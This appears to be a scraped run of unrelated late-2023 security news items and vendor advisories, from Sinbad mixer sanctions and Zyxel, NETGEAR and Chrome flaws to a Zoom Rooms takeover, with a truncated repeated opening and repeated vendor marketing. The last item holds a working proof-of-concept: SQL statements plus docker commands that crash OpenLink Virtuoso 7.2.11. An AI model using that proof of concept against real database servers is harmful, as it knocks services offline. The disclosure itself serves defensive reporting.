The U.S. Treasury Department on Wednesday imposed sanctions against Sinbad, a virtual currency mixer that has been put to use by the North Korea-linked Lazarus Group to launder ill-gotten proceeds.
"Sinbad has processed millions of dollars' worth of virtual currency from Lazarus Group heists, including the Horizon Bridge and Axie Infinity heists," the department said.
"Sinbad is also used by

The U.S. Treasury Department on Wednesday imposed sanctions against Sinbad, a virtual currency mixer that has been put to use by the North Korea-linked Lazarus Group to launder ill-gotten proceeds.

"Sinbad has processed millions of dollars' worth of virtual currency from Lazarus Group heists, including the Horizon Bridge and Axie Infinity heists," the department said.

"Sinbad is also used by cybercriminals to obfuscate transactions linked to malign activities such as sanctions evasion, drug trafficking, the purchase of child sexual abuse materials, and additional illicit sales on darknet marketplaces."

The development builds on prior actions undertaken by the Treasury Department to blockade mixers such as Blender, Tornado Cash, and ChipMixer, all of which have been accused of providing "material support" to the hacking crew by laundering the stolen assets through their services.

Sinbad, created by an individual who goes by the alias "Mehdi" in September 2022, told WIRED earlier this February that it was a legitimate privacy-preserving initiative and that it was launched as a response to the "growing centralization of cryptocurrency and the erosion of the privacy promises it once appeared to offer."

It also emerged as a replacement for Blender, with the Lazarus Group using it to launder virtual currency plundered following the hacks of Atomic Wallet and Harmony Horizon Bridge.

"Overall, more than one third of funds sent to Sinbad during its lifetime have come from crypto hacks," Chainalysis said. "Following the takedown of Tornado Cash and Blender.io last year, Sinbad emerged as the mixer of choice for DPRK-based hacking activities."

Sinbad has also been used by ransomware actors, darknet markets, and scammers, leveraging it to facilitate illicit transactions by obfuscating their origin, destination, and counterparties.

Blockchain analytics firm Elliptic said there is evidence to suggest that the same individual or group is highly likely behind both Sinbad and Blender based on an examination of on-chain patterns, the way in which the two mixers operate, similarities in their websites, and their connections to Russia.

"Analysis of blockchain transactions shows that, before it was publicly launched, a 'service' address on the Sinbad website received Bitcoin from a wallet believed to be controlled by the operator of Blender – presumably in order to test the service," the company noted.

"A Bitcoin wallet used to pay individuals who promoted Sinbad, itself received Bitcoin from the suspected Blender operator wallet. Almost all of the early incoming transactions to Sinbad originated from the suspected Blender operator wallet."

The development comes as Vitalii Chychasov, a 37-year-old administrator of the now-dismantled online marketplace named SSNDOB, was sentenced to eight years in federal prison in the U.S. for selling personal information, including the names, dates of birth, and Social Security numbers.

Chychasov, an Ukrainian national, was arrested in March 2022 while attempting to enter Hungary. He was subsequently extradited to the U.S. in July 2022. SSNDOB was taken down in a joint operation led by the U.S., Cyprus, and Latvia in June 2022.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

U.S. Treasury Sanctions Sinbad Cryptocurrency Mixer Used by North Korean Hackers

The improper neutralization of special elements in the WSGI server of the Zyxel NAS326 firmware version V5.21(AAZF.14)C0 and NAS542 firmware version V5.21(ABAG.11)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted URL to a vulnerable device.

**CVEs: CVE-2023-35137, CVE-2023-35138, CVE-2023-37927, CVE-2023-37928, CVE-2023-4473, CVE-2023-4474****Summary**

Zyxel has released patches addressing an authentication bypass vulnerability and command injection vulnerabilities in NAS products. Users are advised to install them for optimal protection.

**What are the vulnerabilities?**

CVE-2023-35137

An improper authentication vulnerability in the authentication module in Zyxel NAS devices could allow an unauthenticated attacker to obtain system information by sending a crafted URL to a vulnerable device.

CVE-2023-35138

A command injection vulnerability in the “show\_zysync\_server\_contents” function in Zyxel NAS devices could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.

CVE-2023-37927

The improper neutralization of special elements in the CGI program in Zyxel NAS devices could allow an authenticated attacker to execute some OS commands by sending a crafted URL to a vulnerable device.

CVE-2023-37928

A post-authentication command injection vulnerability in the WSGI server in Zyxel NAS devices could allow an authenticated attacker to execute some OS commands by sending a crafted URL to a vulnerable device.

CVE-2023-4473

A command injection vulnerability in the web server in Zyxel NAS devices could allow an unauthenticated attacker to execute some OS commands by sending a crafted URL to a vulnerable device.

CVE-2023-4474

The improper neutralization of special elements in the WSGI server in Zyxel NAS devices could allow an unauthenticated attacker to execute some OS commands by sending a crafted URL to a vulnerable device.

**What versions are vulnerable—and what should you do?**

After a thorough investigation, we have identified the vulnerable products that are within their vulnerability support period, with their firmware patches shown in the table below.

  
**Got a question?**

Please contact your local service rep or visit Zyxel’s Community for further information or assistance.

**Acknowledgment**

Thanks to the following security researchers and consultancies:

*   Maxim Suslov for CVE-2023-35137 and CVE-2023-35138
*   Attila Szász from BugProve for CVE-2023-37927, CVE-2023-37928, CVE-2023-4473, and CVE-2023-4474
*   Drew Balfour from IBM X-Force for CVE-2023-4473

**Revision history**

2023-11-30: Initial release.

CVE-2023-4474: Zyxel security advisory for authentication bypass and command injection vulnerabilities in NAS products | Zyxel Networks

Amazon Web Services announced enhancements to several of its security tools, including GuardDuty, Inspector, Detective, IAM Access Analyzer, and Secrets Manager, to name a few during its re:Invent event.

Source: Techa Tungateja via Alamy Stock Photo

Amazon Web Services has been unveiling a steady stream of announcements during its AWS re:Invent 2023 event in Las Vegas this week. As expected, the focus over the four days has been on artificial intelligence (AI) as AWS strives to show that its offerings can match – or surpass – those from Google Cloud and Microsoft Azure. But even beyond generative AI, AWS is highlighting enhancements to its threat detection, vulnerability assessment, and security policy tools.

First up: AWS has expanded Amazon GuardDuty with Amazon GuardDuty EC2 Runtime Monitoring and Amazon GuardDuty ECS Runtime Monitoring. GuardDuty EC2 Runtime Monitoring, now in preview, introduces runtime threat detection for Amazon Elastic Compute Cloud workloads to give security teams visibility into on-host, operating system-level activities. It also provides container-level context into threats. Amazon GuardDuty ECS Runtime Monitoring uses a lightweight security agent to extend threat detection for workloads running on EC2 and AWS Fargate.

AWS Secrets Manager now supports a single API call to identify and retrieve a group of secrets associated with the application. The BatchGetSecretValue API simplifies developer workflows. And administrators can now enter their own customer-specific security controls in AWS Security Hub to customize security posture monitoring.

**Generative AI to Security**

AWS is adding generative AI to its security tools Amazon Inspector and Amazon Detective. Amazon Inspector, a code-scanning tool for AWS Lambda functions, offers assisted code remediation using generative AI and automated reasoning and can provide in-context code patches for multiple vulnerability classes. Amazon Detective helps security investigations by using generative AI to analyze multiple activities related to potential security events and find group summaries.

Additionally, Amazon Inspector has agentless vulnerability scanning for Amazon Elastic Cloud Compute instances in preview. Amazon Detective now supports log retrieval from Amazon Security Lake and investigating AWS identity and access management entities for indicators of compromise.

**Identity and Access Announcements**

The AWS Identity and Access Manager (IAM) Access Analyzer continuously analyzes user accounts to identify unused access privileges and permissions to help administrators implement the principle of least privilege. Security teams can review the findings to prioritize which accounts need action. The tool also provides custom policy checks to validate that IAM policies adhere to the organization's security standards before systems are deployed.

Amazon EKS Pod Identity allows administrators to define required IAM permissions for applications in Amazon Elastic Kubernetes Service clusters. This allows the applications to connect with AWS services outside of the cluster.

Finally, AWS announced support for mutually authenticating clients presenting X509 certificates to Application Load Balancer. This helps administrators offload client authentication to the load balancer to ensure only trusted clients are able to access the organization's cloud applications.

**About the Author(s)**

Rundown of Security News From AWS re:Invent 2023




A low-privileged OS user with access to a Windows host where NETGEAR ProSAFE Network Management System is installed can create arbitrary JSP files in a Tomcat web application directory. The user can then execute the JSP files under the security context of SYSTEM.





_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

**Tenable Advisory ID:** TRA-2023-39

**CVSSv3 Base / Temporal Score:**  
9.8/9.3

**CVSSv3 Vector:**  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Affected Products:**  
NETGER ProSAFE Network Management System (NMS300) <= v1.7.0.26

**Risk Factor:**  
Critical

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

100 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable Vulnerability Management. A representative will be in touch soon.

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

100 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

100 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable Vulnerability Management. A representative will be in touch soon.

**Try Tenable Nessus Professional Free**

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

**NEW - Tenable Nessus Expert  
Now Available**

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. **Click here to Try Nessus Expert.**

Fill out the form below to continue with a Nessus Pro Trial.

**Buy Tenable Nessus Professional**

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

**Try Tenable Web App Scanning**

_Formerly Tenable.io Web Application Scanning_

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

**Buy Tenable Web App Scanning**

_Formerly Tenable.io Web Application Scanning_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable Lumin**

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable Security Center**

_Formerly Tenable.sc_

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable OT Security**

_Formerly Tenable.ot_

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Request a demo of Tenable Identity Exposure**

_Formerly Tenable.ad_

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Request a Demo of Tenable Cloud Security**

_**Exceptional unified cloud security awaits you!**_

We’ll show you exactly how Tenable Cloud Security helps you deliver multi-cloud asset discovery, prioritized risk assessments and automated compliance/audit reports.

**See  
Tenable One  
In Action**

Exposure management for the modern attack surface.

**See Tenable Attack Surface Management In Action**

_Formerly Tenable.asm_

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable Attack Surface Management. A representative will be in touch soon.

**Try Tenable Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Tenable Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Tenable Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Tenable Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Learn How Tenable Helps Achieve SLCGP Cybersecurity Plan Requirements**

Tenable solutions help fulfill all SLCGP requirements. Connect with a Tenable representative to learn more.

CVE-2023-49694: NETGEAR ProSAFE Network Management System (NMS300) Multiple Vulnerabilities

Google's released an update to Chrome which includes seven security fixes. Make sure you're using the latest version!

Google has released an update to Chrome which includes seven security fixes including one for a vulnerability which is known to have already been exploited.

If you’re a Chrome user on Windows, Mac, or Linux, you should update as soon as possible.

The easiest way to update Chrome is to set it to update automatically, but you have to make sure to close your browser for the update to finish. You can also end up on an older, vulnerable version if something goes wrong—such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerabilities in this batch. My preferred method is to have Chrome open the page _chrome://settings/help_ which you can also find by clicking **Settings > About Chrome** (on Windows) or **Google Chrome > About Google Chrome** (on Mac).

If there is an update available, Chrome will start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

_Google Chrome is up to date_

After the update, the version should be listed as 119.0.6045.199 for Mac and Linux, and 119.0.6045.199/.200 for Windows, or later.

**The technical details**

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE assigned to the actively expoited zero-day is:

CVE-2023-6345: Integer overflow in Skia. Google notes it is aware that an exploit for CVE-2023-6345 exists in the wild. This vulnerability could lead to a range of risks, from crashes to the execution of arbitrary code.

Google never gives out a lot of information about vulnerabilities, for obvious reasons. Access to bug details and links may be kept restricted until a majority of users are updated with a fix, so that interested criminals remain none the wiser.

The fact that the vulnerability is listed with a severity rating of High, indicates that the scope of the flaw is limited to the browser, but this could mean successful exploitation could provide the attacker with information about visited websites and so on.

Skia is an open source 2D graphic library for drawing Text, Geometries, and Images. Skia works across a variety of hardware and software platforms. It serves as the graphics engine for Google Chrome and ChromeOS, Android, Flutter, and many other products.

That’s why users of other Chromium based browsers and software that uses Skia should keep their eyes open for similar updates.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Update now! Chrome fixes actively exploited zero-day vulnerability 

PRESS RELEASE

EAST BRUNSWICK, N.J., Nov. 29, 2023 -- 1Kosmos, the company that unifies identity proofing and passwordless authentication, today announced the 1Kosmos BlockID platform now enables organizations to seamlessly extend web-based identity proofing sessions to a user's mobile device for scanning government issued documents. 

This new capability does not require a mobile application, and creates a frictionless web user journey by eliminating the need for a separate application to capture identity documents and meet identity assurance level (IAL) requirements. Unique to 1Kosmos is the use of a privacy by design architecture where personal information is accessible only upon user consent.

To enable fast and easy identity proofing from the web, without downloading a mobile application, 1Kosmos BlockID connects a browser to a session accessing the camera on a user's mobile device for document verification. It also validates the authenticity of government identity documents with issuing authorities and triangulates personal data from driver’s licenses, passports, national IDs, and more. In addition, 1Kosmos BlockID challenges the user to take a live selfie to ensure they are a real person and matches their selfie with the images scanned from the documents. 

“Traditional identity verification journeys performed on the web require users to install a mobile app for scanning government issued documents,” said Huzefa Olia, Co-Founder and COO for 1Kosmos. “For organizations that prefer an app-less experience, 1Kosmos BlockID eliminates the need for a dedicated app, while providing the flexibility to embed and customize document-based identity proofing across different platforms and end user journeys to suit their identity assurance and security requirements.” 

Cross Platform Identity Proofing

Like the 1Kosmos mobile app, the new app-less web based identity verification capabilities enable users to capture high quality images of government issued documents through mobile devices. 1Kosmos BlockID provides the following capabilities and benefits for implementing identity verification journeys across platforms:

*   Creates separate “verification sessions” for identity proofing with any type of document including driver’s license, passport, National ID and more
    
*   Provides a standalone web client that can extract identity data and validate the authenticity of the document template 
    
*   Offers an interface to define risk thresholds for decisioning on liveness, selfie match, etc. 
    
*   Supports integration with third party providers to validate authenticity of documents and data 
    
*   Enables administrators to review the result from the extraction of documents and data along with a recommendation from 1Kosmos on the status of verification (i.e., Pass or Fail) 
    
*   Enables organizations to build custom user verification journeys via the 1Kosmos control plane
    
*   Provides pre-deployment testing via proofing URLs
    
*   Includes built-in support for internationalization 
    
*   Meets W3C Web Content Accessibility Guidelines
    

Availability

The unified web and mobile identity verification capabilities are available immediately in the 1Kosmos BlockID platform.  

About 1Kosmos BlockID

The 1Kosmos BlockID platform verifies user identity for straight-through onboarding of customers, workers and citizens. It creates a reusable digital wallet for high assurance authentication into digital services and instant validation of end-user qualifications, competencies, authority, and more. A unique privacy-by-design architecture centered around a private and permissioned blockchain eliminates centralized honeypots of end user personal identifiable information (PII), simplifying compliance to privacy mandates such as GDPR and providing organizations tamper evident verification to always know the identity behind devices accessing applications, data and services. BlockID has attained certification to NIST 800-63-3 and UKDAIF via Kantara, FIDO2 and iBeta’s PAD Level 2 guidelines. It is delivered as a stand alone or embedded cloud service or via a managed service as a Credential Service Provider for residents.

About 1Kosmos

1Kosmos enables remote identity verification and passwordless multi-factor authentication for workers, customers and residents to securely transact with digital services. By unifying identity proofing, credential verification and strong authentication, the BlockID platform prevents identity impersonation, account takeover and fraud while delivering frictionless user experiences and preserving the privacy of users’ personal information. BlockID performs millions of authentications daily for government agencies and some of the largest banks, telecommunications, higher education and healthcare organizations in the world. The company is funded by Forgepoint Capital and Gula Tech Adventures with headquarters in East Brunswick, New Jersey. For more information, visit www.1kosmos.com and follow us  on X and LinkedIn.

1Kosmos Unifies Identity Verification User Journeys Across Web and Mobile Platforms

A new study that looked at the password requirements of the most popular websites came to a disappointing but not surprising conclusion.

A new study that examines the current state of password policies across the internet shows that many of the most popular websites allow users to create weak passwords.

For the Georgia Tech study, the researchers designed an algorithm that automatically determined a website’s password policy. With the help of machine learning, they could see the consistency of length requirements and restrictions for numbers, upper- and lower-case letters, special symbols, combinations, and starting letters. They could also see if sites permitted dictionary words or known breached passwords.

Using this tool they found:

*   12% of the websites they looked at completely lack password length requirements
*   3 out of 4 fail to meet minimum requirement standards which means they:
    
    *   Allow very short passwords
    
    *   Do not block common passwords
    
    *   Use outdated requirements like complex characters

More than half of the websites in the study accepted passwords with six characters or less, with 75% failing to require the recommended eight-character minimum. Around 12% of the websites had no length requirements, and 30% did not support spaces or special characters.

Giving users that kind of freedom is asking for them to be duped. As we pointed out a while back, even tech-savvy users like IT administrators resort to awful passwords when given the chance.

The reasons for not enforcing standards are obvious. Most websites care more about customer satisfaction than security, and you can guess which one is better for business.

Users don’t like passwords, especially since the password situation has been made worse by ridiculous and unnecessary rules, such as asking users to pick passwords that follow formulas, or forcing users to change their password every few months. Both rules have been discredited but continue to haunt us. Formulas reduce the number of possible passwords a user can pick from, and regular password resets encourage users to pick passwords that conform to a predictable pattern, both of which can make guessing passwords easier, which is the opposite of what we want.

If you’d like to read more about this, read “Why (almost) everything we told you about passwords was wrong.” The article summarizes how a lot of what you’ve been told about passwords over the years was either wrong (change your passwords as often as your underwear), misguided (choose long, complicated passwords), or counterproductive (don’t reuse passwords).

We feel that we should entirely move away from the model that requires users to create and remember passwords. It is time for something more secure AND user-friendly. And it’s not like these systems don’t exist (hello Passkeys), we just need to embrace them more widely.

Let’s enable muti-factor authentication (MFA) where we can, even if we feel that using a password as the first factor doesn’t add a lot of extra security to the login procedure. And if we need to rely on passwords alone, try using a password manager. They help you create complex passwords and remember them for you.

The full report of the researchers will be presented at the ACM Conference on Computer and Communications Security (CCS) in Copenhagen, Denmark, later this month.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Many major websites allow users to have weak passwords 

By Waqas
A critical Zoom Room vulnerability allowed exploiting service accounts for unauthorized tenant access.
This is a post from HackRead.com Read the original post: Zoom Vulnerability Allowed Hackers to Take Over Meetings, Steal Data

The Zoom vulnerability was originally discovered in June 2023. Despite the discovery being made earlier, the details were only publicly disclosed on November 28, 2023.

Zoom Rooms, the cloud-based video conferencing platform by **Zoom**, is making headlines due to a recently discovered vulnerability. This flaw poses a significant security risk as it enables attackers to seize control of a Zoom Room’s service account, gaining unauthorized access to the victim organization’s tenant.

Exploiting this Zoom vulnerability allows attackers to hijack meetings, manipulate the Contacts feature, infiltrate organization-wide whiteboards, and extract sensitive data from Team Chat channels, even without an invitation. What’s particularly concerning is that these actions can be carried out without detection.

In June 2023, a researcher at AppOmn discovered a vulnerability in Zoom Rooms during HackerOne’s live hacking event, **H1-4420**, where Zoom was a participating company. Despite the discovery being made earlier, the details were only publicly disclosed on November 28, 2023.

In a **blog post** shared with Hackread.com ahead of its scheduled publication on Tuesday, Ciarán Cotter from AppOmni outlined that once attackers gain access to an organization’s tenant, they can infiltrate confidential data shared within Team Chat, Whiteboards, and other Zoom applications.

For your information, **Zoom Rooms** allow team members from different physical locations to collaborate over Zoom. To set it up, the Zoom Rooms app must be installed on a device, such as an iPad. It serves as a terminal for everyone in the room. This device is of critical importance as it attends the meetings on behalf of all. 

When a user creates a Zoom Room, their service account is automatically created with licenses for Whiteboards and Meetings. These accounts possess extensive access within the tenant because of their function as regular team members. 

Exploiting the Zoom vulnerability enabled attackers to predict service account email addresses, hijack the accounts, and collect sensitive information. The issue arose because the Zoom Rooms service account ID was directly inherited from the user with the Owner role in the tenant during the account creation process.

This flaw meant that being in the same meeting as a Zoom Room and messaging it on Team Chat could expose the entire email address, given that it followed the format:  **rooms_<account ID>@companydomain.com.** 

With this information, attackers could create an arbitrary Outlook email address that matches the format: **room__<account ID>@outlook.com** and use it to follow the Zoom sign-up flow. They would receive the activation link sent to the Zoom Room’s email address. With the control of the email inbox, they can click the link and activate the account.

The issue was further intensified by the fact that service accounts couldn’t be removed from Team Chat channels. However, there’s nothing to be wary of as Zoom has addressed this vulnerability by removing the ability to activate Zoom Room accounts. This prevents threat actors from exploiting this predictable email format and claiming unauthorized access to Zoom room service accounts.

Still, this finding highlights the potential misuse of service accounts to gain unauthorized access to **SaaS** systems. Service accounts are frequently used by third-party applications to access SaaS data. Therefore, safeguarding these applications and service accounts is critical for maintaining a robust SaaS security posture.

****_RELATED ARTICLES_****

1.  Zoom Phishing Scam Steals Microsoft Exchange Credentials
2.  Fake Zoom installers infect PCs with RevCode WebMonitor RAT
3.  Zoom web client flaw could’ve let hackers crack meetings passcode
4.  Zoom adds Two-factor authentication (2FA) as extra layer of security
5.  Fake Zoom meeting invite phishing scam harvests Microsoft credentials
6.  ‘Zoom account suspended’ phishing scam aims at Office 365 credentials

Zoom Vulnerability Allowed Hackers to Take Over Meetings, Steal Data

October is a Content Management System (CMS) and web platform to assist with development workflow. A user with access to the media manager that stores SVG files could create a stored XSS attack against themselves and any other user with access to the media manager when SVG files are supported. This issue has been patched in version 3.5.2.

**Impact**

A user with access to the media manager that stores SVG files could create a stored XSS attack against themselves and any other user with access to the media manager when SVG files are supported.

SVG files are supported by default in v3 for convenience; however, this has resulted in multiple mistaken vulnerability reports from security researchers. As per the documentation, if a backend user is not trusted, the advice is to remove the svg extension from the list of supported file types.

**Patches**

The issue has been patched in v3.5.2 by including an SVG sanister. It is enabled by default for new installations but must be enabled for existing sites in the **config/media.php** file.

**Workarounds**

If you cannot upgrade for this patch, follow the pervious advice and remove svg from the supported file types.

**References**

*   https://github.com/octobercms/october/blob/3.x/config/media.php

Credits to:

*   Faris Krivic
*   Okan Kurtulus
*   Aldin Visnjic
*   Bug Shankar

**For more information**

If you have any questions or comments about this advisory:

*   Email us at hello@octobercms.com

CVE-2023-44383: Stored XSS by authenticated backend user with improper configuration

A stack overflow in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 DECIMAL ) ; 
  INSERT INTO v0 VALUES ( 0 ) ; 
  INSERT INTO v0 ( v1 ) SELECT CASE v1 WHEN 49 THEN v1 ELSE \-128 END FROM v0 AS v2 , v0 , v0 AS v3 GROUP BY v1 , v1 ; 
  UPDATE v0 SET v1 \= ( SELECT DISTINCT \* FROM v0 ) ; 

Server Log:

    14:21:24 HTTP/WebDAV server online at 8890
    14:21:24 Server online at 1111 (pid 1)
    *** stack smashing detected ***: terminated
    

Due to the stack smashing, I failed to retrieve the correct backtrace.

ways to reproduce (write poc to the file '/tmp/test.sql' first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

Tag

#web